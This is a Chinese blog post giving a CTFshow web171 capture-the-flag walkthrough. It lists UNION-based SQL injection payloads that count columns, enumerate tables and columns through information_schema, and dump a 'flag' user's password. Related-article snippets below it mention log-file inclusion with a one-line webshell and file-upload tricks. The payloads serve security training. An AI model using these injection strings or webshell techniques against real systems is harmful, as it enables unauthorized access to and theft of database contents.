CTFSHOW web入门——web171

最新推荐文章于 2024-07-31 22:57:22 发布
最新推荐文章于 2024-07-31 22:57:22 发布
阅读量496 收藏 2
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74093152/article/details/129780240
版权
该文演示了SQL查询技术,用于检查数据库结构和获取特定数据。首先,它查询列的数量,然后确定数据库名。接着,列举了ctfshow_web库中的表和ctfshow_user表的列。最后,通过SQL联合查询找到了用户名为flag的相关信息,揭示了可能的数据泄露过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先查询有多少列,1' order by 3--+

 然后查询库名 1' union select 1,2,database() --+

 查看ctfshow_web库的表

1' union select 1,2, table_name from information_schema.tables where table_schema ='ctfshow_web' --+

 获取表名

1' union select 1,2, table_name from information_schema.tables where table_schema =database() --+

获取列名

1' union select 1,2, column_name from information_schema.columns where table_schema =database() and table_name='ctfshow_user' --+

 查询用户名为flag的信息 1' union select id,username,password from ctfshow_user where username='flag' --+

获得flag

韦韦韦www
关注
ctfshow萌新web17
qq_45829213的博客
02-20 2737
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/php/i",$c)){ include($c); } }else{ highlight_file(__FILE__); } ?> c传参过滤掉php 思路:include文件包含,利用日志文件包含 访问日志文件: ?c=/var/log/nginx/access.log 发现日志文件记
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
ctfshow-web入门-sql注入(web171-web175)
Welcome To Myon'Blog !
07-31 2179
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
CTFshow-web入门171sql注入)
Hunter909的博客
10-12 225
username若是对于flag就会被屏蔽、隐藏(没有办法去改变username!=flag),但是会发现ID排序是有顺序的,就可以慢慢试id = 25,id = 26......发现id=26时,flag会出来。因为$sql = "select username,password from user where username!这里是具有sql注入漏洞的,它这里没有限定条件,直接运用简单的sql注入把隐藏的flag找出来就行。
ctf_show笔记篇(web入门---sql注入)171-189
whale_waves的博客
03-12 1406
例如:原理,flag是十六进制的,最大到f所以可以用后面的英文来替换。利用into outfile来将查询到的表的内容写入到服务器的文件里。但这种情况一般需要知道web的地址例如/var/www/html/再利用python或者其他或者人工逆向替换回来。
CTFshow--web入门171-184)
2402_82963715的博客
07-28 1663
CTFshow--web入门171-184的wp。
ctfshow web入门 SQl注入web171--web179
2301_81040377的博客
04-18 598
就能一次性查出25和26的,如果25存在就直接输出flag了,不然的话26存在也行。反正这种盲注问题用脚本就行了学的话看一下这篇文章。过滤了很简单的,当然是select啦,大小写绕过。还用用脚本注入的,但是我还没有成功过所以就…时间盲注,参考下面的文章,还是脚本做。,9999不存在时会查询id=3。我不知道怎么整的,看出是布尔盲注。进行猜测表格的id只有24个。没反应没事我们直接访问试试。是网站文件默认存放位置。本地测试,查询id为。还是base64解码。
CTFshow web入门——爆破
小元砸的博客
01-24 5185
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2718
ctfshow的命令执行(web72-77)
[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1528
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5896
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
CTFshow web入门web171-sql1
weixin_74336671的博客
10-25 189
说明到3就没有了,直接进行union查询 (此时将1改为-1)本题考察sql注入联合查询union select。继续到1‘ order by 4--+首先我们试着注入1‘ and 1=1’继续到1‘ order by 3--+回显异常,说明存在注入。
CTFshow中的web17
zhong_yan的博客
10-26 3482
打开题目,我们看到这样的提示 对于这里的探针我们可以使用tz.php尝试访问 可以看到,访问成功了。 然后这里的flag要一个一个找(emm,做个弊,直接在php信息里面找里面找(滑稽))。 然后找到里面的环境变量(environment) 可以看到里面是有flag的。(虽然也有一些刻意,但也不妨碍成为一种思路。) ...
CTFshow web17
zoixsoadji的博客
03-12 8366
萌新计划 进入题目,是一行php代码,发现c传参过滤掉了php,尝试一下日志文件包含漏洞 nginx的日志文件位置是/var/log/nginx/access.log 发现日志文件记录了User-Agent 那么我们就在User-Agent中写入一句话木马 上传成功,接下来我们就用蚁剑来连接这个一句话木马 连接成功, 在36d.php下面就能看到flag ...
CTF-show WEB入门--web17
m0_73912575的博客
02-06 614
CTF-show WEB入门--web12
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 380
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
CTFshow_web入门_SQL_web171-180
weixin_43896504的博客
07-21 561
SQL注入
CTFshow(web入门)(17~)
chenjyboke的博客
02-19 3498
web17 问题: 备份的sql文件会泄露敏感信息 解决:直接查询 backup.sql打开文件得到flag web18 问题: 不要着急,休息,休息一会儿,玩101分给你flag 解决: 查看源码发现js文件。发现unicode编码解码中文发现访问查看110.php找到flag web19 问题 密钥什么的,就不要放在前端了 解决:查看源码发现账号密码,由于加密使用post传参等得到flag web20 问题: mdb文件是早期asp+acces..
CTF秀WEB入门SQL注入web171
沐一 · 林 的博客
09-06 1068
CTF秀WEB入门SQL注入web171 继续开启全栈梦想之逆向之旅~ 这题是 CTF秀WEB入门SQL注入web171
ctfshow web入门 代码审计 web303
最新发布
01-04
对于CTFShow平台上Web入门级代码审计题目web303,虽然具体细节未直接提及于提供的参考资料中,但从其他相似题目的解析中可以获得一些通用的解题方法和技术。 #### 题目背景理解 通常这类题目涉及的是对给定PHP或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值